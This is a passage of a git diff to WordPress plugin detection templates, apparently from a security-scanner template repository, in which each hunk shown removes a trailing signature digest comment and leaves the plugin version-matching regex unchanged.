'(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca8b7e98aef9c3d3bd8dd529979e30790bee2cbaca2778f537700a6e57836cb9022100a4302b7a3fb80f42473d71c33a4ce590d60f96aedbae123fcce5e49fe43c1c4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 39da3030f1..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bdc2f54d2b16295dd8d412ba1e41d87f6c1d9e53768d4b51f0cc2b978edbe0f0022100ec9ca687e0f670e0c7ad0bf5165094546cceed4358891c826854a045f324f31b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 4950872a65..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022100ec3f46347261a54bdd0b37411c813643975cdafb4d74ea2dd537dbd962b55c59021f5260b4673219a30051c0add154f77f5542e7f921e9b23ecfa5c003e9331fe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index c51022fc8a..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ffa6dc968122efdd768e0a6441571922e7b0e10f87d6dc063fbb5ec6fabd1621022100937d81af566cf7114797ff6beefd6c52024686cb5a7ec9dd283833e87c3c4b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index fcf054ca62..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008bfc2ce547f6c9a04fa02d0237b4482fe3ecc17e0b23f0b1712aa24b30f1e4d0022067b74a75a0a3271b18e6c0eee0d6852e061013a21f1ab86df00bab2f529b2877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 3829b19e11..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cf23056389d7bcba55758cae2f6d009662a54dc7a6816dabad3ec0e6514cc633022100b47f6926b3a5b5ff78c373883c9d6f20f93dc8ab07cd170138bc39e2687af814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index e7fb2c9aed..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca5b8a2e6fcc0ce48a03935bbdcc38b9d974ddb254e65ea960d7274e133b768702210090177f26273e0d70c8e500993023d0770ce286204fc1260cd18acad5dddfe0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 566d9d66d3..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100dc3ad2ce99b4d1897dc35d0fe1453d72d9146dfcb467bf84af1be825e7d5dcc402200fbff4cfd07f464657604191ba7a002c36d8c24dd391201dff4378c8a9b4058b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 8f8b90e338..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200111667a9c0dd141d107758d95799c581a1164f6e282c12ac723334a6f4b158d022100fdb18e3bafefd84e2471b43c9e76396503b85e0ec5094609d45e457b57a096b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 96ca69443f..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b936006d37eb97b293cb403d0d14095beb98d8739e30b590ad4e75ff1f676832022100cc002c0dc443ef5b86bf04a46346e12ed0c155165f6994ed8af016c6ce0559aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index d8a6e8be9c..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a6a0cf17ea9836c53f4ee9a0a9fb73bda620a77f86fd955e3860fc64444374090221009d1e4ec90385a85f82ad6488e7fdc33c9eed8515c80ff6db3e4ff1f2c8204b5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 11c4989221..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099a2fb30d6f2c3c7d295964cf8eb01da385ba1635a15b8f358eae222a146a87802201f39537fe7dfc25eb25b494b2ec970e18131988dee90d4d4fc2731c919a8522c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 24cd85e187..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022024e4cf41330ba6aa1506a16856bac78905ebf1d9e47d2019193ddac3e703b75a0220177cf6ad47c427325e80396d5bb739df78a821124b7f24e1bf2bf47328ed3dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index f2fdf187f7..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205e3413f1ad0393bbebb79e8c4a3ebab8976f85637c108efd271553cea3d44609022100ce6a633288dce3c5859bd5037b1f394e1efe318834b855155c54e6f2666378ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 567167e75c..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 480a00453043021f4a67da57e575c473a3362ecae4e74dcc0acdf2f4e4207540badc3a1ba08cf5022062a866e2a74409e264f2b4d10ed09135f9c199379a63ae7bcc12fafabcf8dd24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 58c47077a3..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100980f7f675e69ff9df7afadd20cbfb804636a4f8559ca690c873dd106b9c4c9a8022100e6b20b71f6e7cba4825d66b818a959847e0c35ad5ea490debad4455ecb5b1090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 1a51983533..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bcd7d4e128968717a71f00f049c283f79179e1e14f0215fe7a7ff6ca32e58230022100e23be9bd3d0605703cce1d42c2351ad72bd31f3a97b04c3fd9842c59b3f5737a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 7974257255..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210099df16426e8a6ac03b18149506bd293a58d5a79311a2c6e6cf8c2b87faa48cbc02201362a29c6983d9300940ade71d2fa8366ec5135e7fe383529351852849c7e071:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 81b2f20d27..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c846ee451ef63386e1431dc46ee36b313bb29d404df7ba7b3f7b89ca3b42257e022048919c3189e0c182bf4c190e9829dd8f92e392ed5e7d3ab220a1b15fee818ef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index a2660daa39..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f0ca515c9640e342359ea3ab01f4c55b8c72452988a4fb9eebd380b15ba4cae022100f22b43bd52c6c075f5d57fb74e54681c243f37d7eddaf1ee90d66833ba2184e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 29d724422d..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201946f3bc2c0e34616e0b60553ef0a482933d22969b6280b6bc47565abc3603ca0220131faa3891ddacd9305154ff33f198e0eae8b71c219089a948401120e58b4b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 70ec4564e0..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008e6cc350681113b7199d3b37cde6d4fd3ebac9c36f553dcc8963cd43254cae52022100fb16d2183f75275ce013c2123127b3ef1acafb9b24c67ecd698bf75ebe227d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 61664c50ae..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6c287444167a4f127205bf92030a6420544f8b77758bda980155b834ac985870221008972a484f6538c4f548e2ee726558b81936c975a7eaca4d441a7c92a0e9c00bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 4ea202938d..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e0ebce1fe622b3d0cc478d3dba1ecd9236292d841e71e426fdadc7b824a73349022019ef42eca1a0953f72bc8e770988a9ef89510441af0a947b07a0d78ba4d12cbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 317f88524a..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201cf417d83d3992f57c51cbc5f191a33c2eabc8b3bcd5690ed592320d8591afd302207976ee372387e5f173371d2eeb7e5db7632ffa65a8d4f892e8144ec2bbcc495d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 29f1106364..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008a683a47602cc3c37262fe1be74fc64c8548c90e030662b164c7cc2cb8be464f022100d5222b76ff1c01e4dc0df6b548dfb1c9808e3832cd826a8d4bce066515620e76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 6bc0cd435a..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c33ef075ccee2fb533dbe39730ebe8e44594696700881cd359742cd2f3723e1002206ba4f22c5a2535f19737efec6cc00342b1aa148f50053b270007bf78d5460592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 69b67310df..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ec0d6a0762797551cde5d840473a28ad0cf77cd0dd11ff0e2b4c7a82930a11ba022100ea8d58ca20b5811d048cb89892208a05e950f158567dc2fef6a474312c071e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 69bd9ae6d3..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205abe3333b14390a9a02e0a9a4150e3b9654dfaf7775cb8bddfda8151d90b482d02203ae7bc939996aab653c56ad3410f752e58166afb45baf1a40383a099760d9418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 592cd3c4f4..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220273d3545c799d747229b103499a0eb5fd2958e97aa5af1ef4d7d0cab5bcc1ef902201b54b66a6e344428d8d8e3cf9b01ff5698da56951cbaa049d60b1faa839d689c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 0a71f373d0..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b1f7789131a9f093b6e035100356eaa8360674a33edf981e84d30390bcf66b3f02205fedd801f9fdd8c3797ca0511b94bf5bd5939029a17882e8e11664adb36da551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 7ab44d13e6..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022028e45bec06e6ccc61a29a2ad2b541da20981bfe87115c351b3e43d66014917ca02200f05d96141ab7db577ff9402a4738f733386ce0655cae8e23dc24a72a147f371:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 4ba2b5193b..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022026cef4606ea9d496b03acbb2faf6f14b90fdf7a7a6d5f1fea5f7e8d0f6bb86c502203400b24faf8269557a18440054bc028c01d06a4407b6b5774143e11b270deeac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 385acdf8d8..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202a67c94f0ef59972aed4fab805ebd224e508063b02a8f738dd8727014711ef040220262f647ea3e1508e395b817c9291c816c6caf18fe36ad504f4b0c15249914eb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 324d67a809..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220634bb3664020ae84b93aad0527d7dee85999f841bbb3fe02ac58875b0c86569b0220175248133afe2e3ff82dda46d5455020fc2a76dfac68395d8eb1aa3d56e38ec0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 785acde2d4..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f028e90fa6ea25c767e8870166a69582a75cb02384305a2c7ccf9b52759347ac022100818ff8b19007b69fcf0e7425f5b2cdd7f053ea9ce8e227703ac04e5637e4c7fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d11c4fbdbc..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022038ead4a2f4b82c6d8e7d1f60759cbecf83651e26fef84739c85f4ddf024b9919022100b2e2e8c8788c76d038122441a526218114165129f6a44d3fabeaba9bf03743d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index dc456fe409..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d822a1cae17d644642c3c2dd8b3973cbf350063d905f61149b28c851a51c13e50221009e968fcf161f4342fcbd619bc3fb6b5ca54f78ab0579232a0e69cc5d79bddc1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 0f7864431a..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206dbf69e571e0dd93676e434cdd7881cc04e41e30add07f9cda817b62695c253e022100d1c8c4e9385d9ef93948e26e42034e11a3e5f5f54c4677bd4eae4e6b601b8b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index ebb851afbf..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e14b1ad042596c87199c7ec24f9a6090137a5a5ebccb74da978adbf338f660c022060143c875a8a7d4de5bd2dee3524626b9ad6ea3bc4b2fc76fd73787890637e93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index f3f8a1ec4d..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f6b0fc37fbeeb5653a3a799513dbdee9523c6e79593509b01109e191eae012d90220076493e1c7773aa2b9da9a926b4717b506533f5b164c3faf6a7689c49a00aa53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 29d4f1c3a3..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207905ab0e9481805a8320c197fb489e0aaff0132199cc12361aa86bedfc5e640b02207ce91ed8e6f2b5327d970814284ce85bc7e10703f437b8aae649d5b8b98d534e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 6fee280bbb..540d535ecc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a088e6ee96733a1bfd08c41dae81ad864c6c04c3831b6dee7927857bef74c1ea02204fa74384e1e04de0498f162545061ca1c1d57f69440e3e0276232f846948a547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index feb63fb9c3..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b4961d60bc926ccb84d777130c520e70d206400b201b9066c22015857167bf48022100921f7f532c4c93178e92da46930c76a0dbf6d342dbb83e3e53d7a02310e87527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 74dfa66736..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f84750e61cfc16da55e1ee06e8a8c265feb35a96aaee68305a0df0df603cbd2022100e5a455530a8058078631b1b744de95c08625ebd6ac9df31294480aa06b599c86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 4e3da4149a..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d5d93493a35c88d252a492e44c3044eb790a04cbdaea8dcdd17351b0a87caf19022100f14e10428a687a20acfb2033cb7814545012411cb2d373009d68854a08ac0918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 1b06b2b6a7..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008d1566cbca04798c4732d5e7abc57da6df2e3d03add50dd370ee53cc1e39cbd00220050b157b1828af27a8911a36ec793676a7830d33fde111bd36d73acb8aef6e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 0d4dc19203..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 